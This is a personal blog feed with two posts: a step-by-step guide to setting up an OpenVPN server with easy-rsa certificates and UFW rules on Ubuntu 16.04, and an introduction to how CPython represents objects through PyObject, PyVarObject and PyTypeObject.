<content type="html"><![CDATA[<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/06/27/329318860.jpg" alt="open_vpn_server_tw.jpg"></p><p><strong>Adapted from <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04" target="_blank" rel="noopener">How To Set Up an OpenVPN Server on Ubuntu 16.04</a></strong></p><h2 id="为什么需要-OpenVPN"><a href="#为什么需要-OpenVPN" class="headerlink" title="为什么需要 OpenVPN"></a>Why OpenVPN</h2><p>For me, there are two reasons:</p><ul><li>Browsing safely on unsafe networks: when I need to get online at a hotel, a café, or over untrusted Wi-Fi, I need to be sure I am not being eavesdropped on.</li><li>Getting past the firewall and enjoying an unrestricted network.</li></ul><p>So why not ShadowSocks? In fact I use it too, but its performance on iOS is unsatisfactory, and on a PC, using Chrome with ss to get past the firewall requires fairly complicated configuration (or maybe I just don't know how to use it). By comparison, OpenVPN handles all of this conveniently (apart from a more involved installation). So this post records the process of installing an OpenVPN server, for reference.</p><p>The server used here runs Ubuntu 16.04, but the steps should apply to other Debian-based systems as well.</p><a id="more"></a><hr><h2 id="安装-OpenVPN,设置-CA-目录"><a href="#安装-OpenVPN,设置-CA-目录" class="headerlink" title="安装 OpenVPN,设置 CA 目录"></a>Install OpenVPN and Set Up the CA Directory</h2><p>First, install OpenVPN on the server. It can be installed conveniently with <code>apt-get</code>; we also need <code>easy-rsa</code>:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ sudo apt-get update</span><br><span class="line">$ sudo apt-get install openvpn easy-rsa</span><br></pre></td></tr></table></figure></p><p>Then copy the <code>easy-rsa</code> template into the <code>home</code> directory:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ make-cadir ~/openvpn-ca</span><br><span class="line">$ cd ~/openvpn-ca</span><br></pre></td></tr></table></figure><hr><h2 id="配置-CA-变量"><a href="#配置-CA-变量" class="headerlink" title="配置 CA 变量"></a>Configure the CA Variables</h2><p>After entering the <code>openvpn-ca</code> directory, open the <code>vars</code> file with vim (or any editor). Near the end of the file you will see the following:</p><figure class="highlight plain"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">. . .</span><br><span class="line"></span><br><span class="line">export KEY_COUNTRY="US"</span><br><span class="line">export KEY_PROVINCE="CA"</span><br><span class="line">export KEY_CITY="SanFrancisco"</span><br><span class="line">export KEY_ORG="Fort-Funston"</span><br><span class="line">export KEY_EMAIL="me@myhost.mydomain"</span><br><span class="line">export KEY_OU="MyOrganizationalUnit"</span><br><span class="line"></span><br><span class="line">. . .</span><br></pre></td></tr></table></figure><p>Change these to whatever values you like, as long as none is left blank:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">. . .</span><br><span class="line"></span><br><span class="line">export KEY_COUNTRY="CN"</span><br><span class="line">export KEY_PROVINCE="BJ"</span><br><span class="line">export KEY_CITY="Beijing"</span><br><span class="line">export KEY_ORG="xlzd"</span><br><span class="line">export KEY_EMAIL="what@the.fuck"</span><br><span class="line">export KEY_OU="Community"</span><br><span class="line"></span><br><span class="line">. . 
.</span><br></pre></td></tr></table></figure><p>Next, set <code>KEY_NAME</code> to a name of your choice; for simplicity we use <code>server</code> here:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KEY_NAME="server"</span><br></pre></td></tr></table></figure><p>Then save and close the file.</p><hr><h2 id="构建-Certificate-Authority"><a href="#构建-Certificate-Authority" class="headerlink" title="构建 Certificate Authority"></a>Build the Certificate Authority</h2><p>In the same directory, run <code>source vars</code>; you should see the following output:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/xlzd/openvpn-ca/keys</span><br></pre></td></tr></table></figure><p>Then run:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ./clean-all</span><br><span class="line">$ ./build-ca</span><br></pre></td></tr></table></figure><p>This starts the process of creating the root certificate authority key and certificate. Because we just edited the <code>vars</code> file, all the values should be filled in automatically, so just press Enter at every prompt:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span 
class="line">Output</span><br><span class="line">Generating a 2048 bit RSA private key</span><br><span class="line">..........................................................................................+++</span><br><span class="line">...............................+++</span><br><span class="line">writing new private key to 'ca.key'</span><br><span class="line">-----</span><br><span class="line">You are about to be asked to enter information that will be incorporated</span><br><span class="line">into your certificate request.</span><br><span class="line">What you are about to enter is what is called a Distinguished Name or a DN.</span><br><span class="line">There are quite a few fields but you can leave some blank</span><br><span class="line">For some fields there will be a default value,</span><br><span class="line">If you enter '.', the field will be left blank.</span><br><span class="line">-----</span><br><span class="line">Country Name (2 letter code) [CN]:</span><br><span class="line">State or Province Name (full name) [BJ]:</span><br><span class="line">Locality Name (eg, city) [Beijing]:</span><br><span class="line">Organization Name (eg, company) [xlzd]:</span><br><span class="line">Organizational Unit Name (eg, section) [Community]:</span><br><span class="line">Common Name (eg, your name or your server's hostname) [the.fuck]:</span><br><span class="line">Name [server]:</span><br><span class="line">Email Address [what@the.fuck]:</span><br></pre></td></tr></table></figure><p>At this point we have the CA that the following steps need.</p><hr><h2 id="创建服务器端证书、密钥和加密文件"><a href="#创建服务器端证书、密钥和加密文件" class="headerlink" title="创建服务器端证书、密钥和加密文件"></a>Create the Server Certificate, Key, and Encryption Files</h2><p>Run <code>./build-key-server server</code> and again press Enter through the prompts. At the end, enter <code>y</code> twice to sign the certificate and commit it:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">. . .</span><br><span class="line"></span><br><span class="line">Certificate is to be certified until May 1 17:51:16 2026 GMT (3650 days)</span><br><span class="line">Sign the certificate? [y/n]:y</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">1 out of 1 certificate requests certified, commit? [y/n]y</span><br><span class="line">Write out database with 1 new entries</span><br><span class="line">Data Base Updated</span><br></pre></td></tr></table></figure><p>We still need to generate a few more files. Run <code>./build-dh</code> in the terminal to generate the Diffie-Hellman parameters; this can take a few minutes. Then generate an HMAC signature to strengthen the server's TLS integrity verification:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openvpn --genkey --secret keys/ta.key</span><br></pre></td></tr></table></figure><hr><h2 id="生成客户端证书、密钥对"><a href="#生成客户端证书、密钥对" class="headerlink" title="生成客户端证书、密钥对"></a>Generate a Client Certificate and Key Pair</h2><p>You may repeat this step later to generate certificates for other clients. Here we use <code>xclient</code> as the name of the first key pair:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd ~/openvpn-ca</span><br><span class="line">source vars</span><br><span class="line">./build-key xclient</span><br></pre></td></tr></table></figure><p>As before, just press Enter through the prompts.</p><hr><h2 id="配置-OpenVPN-服务"><a href="#配置-OpenVPN-服务" class="headerlink" title="配置 OpenVPN 服务"></a>Configure the OpenVPN Service</h2><p>First, copy the files into the OpenVPN directory:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ cd ~/openvpn-ca/keys</span><br><span class="line">$ sudo cp ca.crt ca.key server.crt server.key ta.key dh2048.pem 
/etc/openvpn</span><br></pre></td></tr></table></figure><p>Then copy and unpack a sample OpenVPN configuration:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz | sudo tee /etc/openvpn/server.conf</span><br></pre></td></tr></table></figure><p>Next, adjust the configuration. Open <code>/etc/openvpn/server.conf</code>, find the <code>redirect-gateway</code> line, uncomment it, and make sure it reads:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">push "redirect-gateway def1 bypass-dhcp"</span><br></pre></td></tr></table></figure><p>Then find the <code>dhcp-option</code> lines and change them to the following:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">push "dhcp-option DNS 208.67.222.222"</span><br><span class="line">push "dhcp-option DNS 208.67.220.220"</span><br></pre></td></tr></table></figure><p>Next, find the <code>tls-auth</code> line, uncomment it, and add a <code>key-direction</code> line below it:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tls-auth ta.key 0 # This file is secret</span><br><span class="line">key-direction 0</span><br></pre></td></tr></table></figure><p>Finally, uncomment the <code>user</code> and <code>group</code> lines:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">user nobody</span><br><span class="line">group nogroup</span><br></pre></td></tr></table></figure><hr><h2 id="调整服务器网络配置"><a href="#调整服务器网络配置" class="headerlink" title="调整服务器网络配置"></a>Adjusting the Server Network Configuration</h2><h3 id="允许-IP-转发"><a href="#允许-IP-转发" class="headerlink" title="允许 IP 转发"></a>Enabling IP Forwarding</h3><p>Edit <code>/etc/sysctl.conf</code> and uncomment the <code>net.ipv4.ip_forward</code> setting:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net.ipv4.ip_forward=1</span><br></pre></td></tr></table></figure><p>Run <code>sudo sysctl -p</code> to reload the file and apply the setting to the current session.</p><h3 id="调整-UFW-规则"><a href="#调整-UFW-规则" class="headerlink" title="调整 UFW 规则"></a>Adjusting the UFW Rules</h3><p>Edit <code>/etc/ufw/before.rules</code> and, near the top of the file, add the content shown on lines 11-18 below:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">01 #</span><br><span class="line">02 # rules.before</span><br><span class="line">03 #</span><br><span class="line">04 # Rules that should be run before the ufw command line added rules. 
Custom</span><br><span class="line">05 # rules should be added to one of these chains:</span><br><span class="line">06 # ufw-before-input</span><br><span class="line">07 # ufw-before-output</span><br><span class="line">08 # ufw-before-forward</span><br><span class="line">09 #</span><br><span class="line">10 </span><br><span class="line">11 # START OPENVPN RULES</span><br><span class="line">12 # NAT table rules</span><br><span class="line">13 *nat</span><br><span class="line">14 :POSTROUTING ACCEPT [0:0] </span><br><span class="line">15 # Allow traffic from OpenVPN client to eth0</span><br><span class="line">16 -A POSTROUTING -s 10.8.0.0/8 -o eth0 -j MASQUERADE</span><br><span class="line">17 COMMIT</span><br><span class="line">18 # END OPENVPN RULES</span><br><span class="line">19</span><br><span class="line">20 # Don't delete these required lines, otherwise there will be errors</span><br><span class="line">*filter</span><br><span class="line">. . .</span><br></pre></td></tr></table></figure><p>Line 16 needs one more adjustment. Run <code>ip route | grep default</code> in the terminal and you will see output similar to the following:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">default via 100.110.78.1 dev ens3</span><br></pre></td></tr></table></figure><p>The value after <code>dev</code> is the interface name we need. With the output above, mine is <code>ens3</code>; yours may differ. Replace <code>eth0</code> on line 16 of the file with it, then save the file and exit.</p><p>Next, edit <code>/etc/default/ufw</code>, find the <code>DEFAULT_FORWARD_POLICY</code> setting, and change it to:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DEFAULT_FORWARD_POLICY="ACCEPT"</span><br></pre></td></tr></table></figure></p><h3 id="打开-OpenVPN-端口并使变化生效"><a href="#打开-OpenVPN-端口并使变化生效" class="headerlink" title="打开 OpenVPN 端口并使变化生效"></a>Opening the OpenVPN Port and Applying the Changes</h3><p>Run the following commands:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ sudo ufw allow 1194/udp</span><br><span class="line"></span><br><span class="line">$ sudo ufw disable</span><br><span class="line">$ sudo ufw enable</span><br></pre></td></tr></table></figure><hr><h2 id="启动-OpenVPN"><a href="#启动-OpenVPN" class="headerlink" title="启动 OpenVPN"></a>Starting OpenVPN</h2><p>Run:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sudo systemctl start openvpn@server</span><br></pre></td></tr></table></figure><p>Then enable it to start at boot:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sudo systemctl enable openvpn@server</span><br></pre></td></tr></table></figure></p><hr><h2 id="创建客户端配置"><a href="#创建客户端配置" class="headerlink" title="创建客户端配置"></a>Creating the Client Configuration</h2><p>Run:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ mkdir -p ~/client-configs/files</span><br><span class="line"></span><br><span class="line">$ chmod 700 ~/client-configs/files</span><br><span class="line"></span><br><span class="line">$ cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/client-configs/base.conf</span><br></pre></td></tr></table></figure></p><p>Then open <code>~/client-configs/base.conf</code>, replace <code>server_IP_address</code> in the <code>remote server_IP_address 1194</code> line with your server's public IP, and uncomment the <code>user</code> and <code>group</code> lines:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># Downgrade privileges after initialization (non-Windows only)</span><br><span class="line">user nobody</span><br><span class="line">group nogroup</span><br></pre></td></tr></table></figure><p>Find the <code>ca</code>/<code>cert</code>/<code>key</code> lines and comment them out:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># SSL/TLS parms.</span><br><span class="line"># See the server config file for more</span><br><span class="line"># description. It's best to use</span><br><span class="line"># a separate .crt/.key file pair</span><br><span class="line"># for each client. A single ca</span><br><span class="line"># file can be used for all clients.</span><br><span class="line">#ca ca.crt</span><br><span class="line">#cert client.crt</span><br><span class="line">#key client.key</span><br></pre></td></tr></table></figure><p>Finally, add one line at the end of the file:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">key-direction 1</span><br></pre></td></tr></table></figure><p>Save and close the file.</p><h3 id="创建配置生成脚本"><a href="#创建配置生成脚本" class="headerlink" title="创建配置生成脚本"></a>Creating a Config Generation Script</h3><p>Create <code>~/client-configs/make_config.sh</code> and paste in the following:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/bash</span><br><span class="line"></span><br><span class="line"># First argument: Client identifier</span><br><span class="line"></span><br><span class="line">KEY_DIR=~/openvpn-ca/keys</span><br><span class="line">OUTPUT_DIR=~/client-configs/files</span><br><span class="line">BASE_CONFIG=~/client-configs/base.conf</span><br><span class="line"></span><br><span class="line">cat ${BASE_CONFIG} \</span><br><span class="line">    <(echo -e '<ca>') \</span><br><span class="line">    ${KEY_DIR}/ca.crt \</span><br><span class="line">    <(echo -e '</ca>\n<cert>') \</span><br><span class="line">    ${KEY_DIR}/${1}.crt \</span><br><span class="line">    <(echo -e '</cert>\n<key>') \</span><br><span class="line">    ${KEY_DIR}/${1}.key \</span><br><span class="line">    <(echo -e '</key>\n<tls-auth>') \</span><br><span class="line">    ${KEY_DIR}/ta.key \</span><br><span class="line">    <(echo -e '</tls-auth>') \</span><br><span class="line">    > ${OUTPUT_DIR}/${1}.ovpn</span><br></pre></td></tr></table></figure><p>Save it and make it executable:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ chmod 700 ~/client-configs/make_config.sh</span><br></pre></td></tr></table></figure><hr><h2 id="生成客户端配置"><a href="#生成客户端配置" class="headerlink" title="生成客户端配置"></a>Generating the Client Configuration</h2><p>Run:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ cd ~/client-configs</span><br><span class="line">$ ./make_config.sh 
xclient</span><br></pre></td></tr></table></figure><p>The <code>~/client-configs/files</code> directory now contains <code>xclient.ovpn</code>. Download the file to your local machine and it is ready to use.</p><hr><h2 id="客户端下载"><a href="#客户端下载" class="headerlink" title="客户端下载"></a>Client Downloads</h2><p>Windows: <a href="https://openvpn.net/index.php/open-source/downloads.html" target="_blank" rel="noopener">OpenVPN</a><br>OS X: <a href="https://tunnelblick.net/downloads.html" target="_blank" rel="noopener">Tunnelblick</a><br>iOS: <a href="https://itunes.apple.com/us/app/id590379981" target="_blank" rel="noopener">OpenVPN Connect</a><br>Android: <a href="https://play.google.com/store/apps/details?id=net.openvpn.openvpn" target="_blank" rel="noopener">OpenVPN Connect</a></p><p>After installing a client, import the configuration file generated above and you can enjoy a safe, wall-free internet~~~</p>]]></content>
<summary type="html">
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/06/27/329318860.jpg" alt="open_vpn_server_tw.jpg"></p>
<p><strong>Based on <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04" target="_blank" rel="noopener">How To Set Up an OpenVPN Server on Ubuntu 16.04</a></strong></p>
<h2 id="为什么需要-OpenVPN"><a href="#为什么需要-OpenVPN" class="headerlink" title="为什么需要 OpenVPN"></a>Why OpenVPN</h2><p>For me, there are two reasons:</p>
<ul>
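<li>Browsing safely on insecure networks: when I have to go online in a hotel, a cafe, or over any untrusted Wi-Fi, I need to be sure nobody is eavesdropping on me.</li>
<li>Getting past the firewall and enjoying an open network.</li>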
</ul>
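<p>So why not just use ShadowSocks? Actually, I use it too, but it is unsatisfying on iOS, and using Chrome with ss on a PC to get past the firewall needs fairly complicated configuration (or maybe I am just doing it wrong). By comparison, OpenVPN handles all of this conveniently (apart from the more involved installation). This post therefore records how to install an OpenVPN server, for reference.</p>
<p>The server used here runs Ubuntu 16.04, but the steps should also apply to other Debian-family systems.</p>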
</summary>
<category term="Linux" scheme="https://xlzd.me/tags/Linux/"/>
<category term="GFW" scheme="https://xlzd.me/tags/GFW/"/>
</entry>
<entry>
<title>An Overview of Objects in Python</title>
<link href="https://xlzd.me/2016/08/29/object-in-py/"/>
<id>https://xlzd.me/2016/08/29/object-in-py/</id>
<published>2016-08-29T13:58:19.000Z</published>
<updated>2019-05-14T06:33:49.578Z</updated>
<content type="html"><![CDATA[<p>In the Python world, everything is an object. int, list, dict and so on are all objects, and functions and classes are objects too. So what exactly are these objects?</p><p>In the end, a Python object is a block of heap memory laid out as a C struct. This post gives a brief first look at how that is implemented.<br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/09/987200237.png" alt="obj"></p><a id="more"></a><hr><h2 id="万物基于-MIUI:-PyObject"><a href="#万物基于-MIUI:-PyObject" class="headerlink" title="万物基于 MIUI: PyObject"></a>Everything Is Based on MIUI: PyObject</h2><p>All Python objects share a few common properties, which are defined in <code>PyObject</code>. <code>PyObject</code> is defined in <code>Include/object.h</code>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PyObject_HEAD \</span></span><br><span class="line">    _PyObject_HEAD_EXTRA \</span><br><span class="line">    Py_ssize_t ob_refcnt; \</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> _<span class="title">typeobject</span> *<span class="title">ob_type</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">object</span> {</span></span><br><span class="line">    PyObject_HEAD</span><br><span class="line">} PyObject;</span><br></pre></td></tr></table></figure><p>Simplified, this is:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">object</span> {</span></span><br><span 
class="line">    Py_ssize_t ob_refcnt;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> _<span class="title">typeobject</span> *<span class="title">ob_type</span>;</span></span><br><span class="line">} PyObject;</span><br></pre></td></tr></table></figure></p><p>In <code>PyObject</code>, <code>ob_refcnt</code> records the object's reference count (this underpins reference-counting memory reclamation, which is not covered here). When a new pointer refers to the object, <code>ob_refcnt</code> is incremented by 1; when a pointer to the object is removed, it is decremented by 1. Once it reaches zero, the object can be removed from the heap (in practice it is not necessarily freed right away, which is also not covered here). Besides <code>ob_refcnt</code> there is <code>ob_type</code>, a pointer to a <code>_typeobject</code> struct, which describes the object's type. Setting the details of <code>_typeobject</code> aside, the core of a Python object is a reference count plus type information.</p><p>The fields defined by <code>PyObject</code> appear at the start of the memory occupied by every object.</p><hr><h2 id="定长对象与变长对象"><a href="#定长对象与变长对象" class="headerlink" title="定长对象与变长对象"></a>Fixed-Size and Variable-Size Objects</h2><p>Besides fixed-size objects such as <code>bool</code> and <code>float</code> (whose memory requirement never changes once determined), Python has another kind of object: variable-size objects. The implementation represents these with the <code>PyVarObject</code> struct:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#define PyObject_VAR_HEAD \</span><br><span class="line">    PyObject_HEAD \</span><br><span class="line">    Py_ssize_t ob_size; /* Number of items in variable part */</span><br><span class="line"></span><br><span class="line">typedef struct {</span><br><span class="line">    PyObject_VAR_HEAD</span><br><span class="line">} PyVarObject;</span><br></pre></td></tr></table></figure><p>In effect, it is <code>PyObject</code> plus an <code>ob_size</code> field that records the object's length (<strong>the number of items, not the memory footprint</strong>). In other words, <code>PyVarObject</code> is simply an extension of <code>PyObject</code>, so <strong>every object in Python can be referenced through a <code>PyObject *</code> pointer</strong>. This matters a great deal because it lets many operations be handled uniformly (not detailed in this post).</p><p>As a result, the memory layout of any Python object takes one of the following two forms:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">  Fixed-size     Variable-size</span><br><span class="line">+-----------+   +-----------+</span><br><span class="line">| ob_refcnt |   | ob_refcnt |</span><br><span class="line">+-----------+   +-----------+</span><br><span class="line">|  ob_type  |   |  ob_type  |</span><br><span class="line">+-----------+   +-----------+</span><br><span class="line">|           |   |  ob_size  |</span><br><span class="line">|           |   +-----------+</span><br><span class="line">|   other   |   |           |</span><br><span class="line">|           |   |   other   |</span><br><span class="line">|           |   |           |</span><br><span class="line">+-----------+   +-----------+</span><br></pre></td></tr></table></figure><hr><h2 id="道生一:PyTypeObject"><a href="#道生一:PyTypeObject" class="headerlink" title="道生一:PyTypeObject"></a>The Tao Gives Birth to One: PyTypeObject</h2><p>The description of <code>PyObject</code> mentioned a <code>_typeobject</code> struct. What is it for? Consider information such as how much memory an object needs when it is created, or what its class name is: how is that recorded and told apart?</p><p><code>_typeobject</code> (that is, <code>PyTypeObject</code>) can be described as "the type object that specifies an object's type". It is defined as follows:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">typeobject</span> {</span></span><br><span 
class="line">    PyObject_VAR_HEAD</span><br><span class="line">    <span class="keyword">const</span> <span class="keyword">char</span> *tp_name; <span class="comment">/* For printing, in format "<module>.<name>" */</span></span><br><span class="line">    Py_ssize_t tp_basicsize, tp_itemsize; <span class="comment">/* For allocation */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// ...... parts not relevant here are omitted</span></span><br><span class="line"></span><br><span class="line">} PyTypeObject;</span><br></pre></td></tr></table></figure><p>You can think of a <code>PyTypeObject</code> as the implementation of the object-oriented notion of a "class" in Python. Only part of its definition is introduced here:</p><ul><li>tp_name: the type name</li><li>tp_basicsize, tp_itemsize: sizing information used when allocating memory for an object of this type</li><li>The omitted part: operations associated with the type (function pointers)</li></ul><p>This is only a rough sketch and the description above is somewhat simplified, so there is no need to dig into it too deeply for now.</p><p>Looking at the definition of <code>PyTypeObject</code> again, it also begins with <code>PyObject_VAR_HEAD</code>, which means it is itself an object. So if a <code>PyTypeObject</code> is an object that describes a type, what is its own type? The answer is <code>PyType_Type</code>:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PyTypeObject PyType_Type = {</span><br><span class="line">    PyVarObject_HEAD_INIT(&PyType_Type, 0)</span><br><span class="line">    "type", /* tp_name */</span><br><span class="line">    sizeof(PyHeapTypeObject), /* tp_basicsize */</span><br><span class="line">    sizeof(PyMemberDef), /* tp_itemsize */</span><br><span class="line">    (destructor)type_dealloc, /* tp_dealloc */</span><br><span class="line">    // ...... 
some content omitted</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>In fact, <code>PyType_Type</code> is the <code>type</code> object of the Python language. It is the class of all classes, which Python calls a metaclass. In the implementation, its <code>ob_type</code> pointer points back to itself, that is:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> PyType_Type</span><br><span class="line">+-----------+<-------+</span><br><span class="line">| ob_refcnt |        |</span><br><span class="line">+-----------+        |</span><br><span class="line">|  ob_type  +--------+</span><br><span class="line">+-----------+</span><br><span class="line">|           |</span><br><span class="line">|   other   |</span><br><span class="line">|           |</span><br><span class="line">+-----------+</span><br></pre></td></tr></table></figure><hr><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>Summary</h2><p>This was a brief, high-level sketch of what objects are in Python.</p>]]></content>
<summary type="html">
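<p>In the Python world, everything is an object. int, list, dict and so on are all objects, and functions and classes are objects too. So what exactly are these objects?</p>
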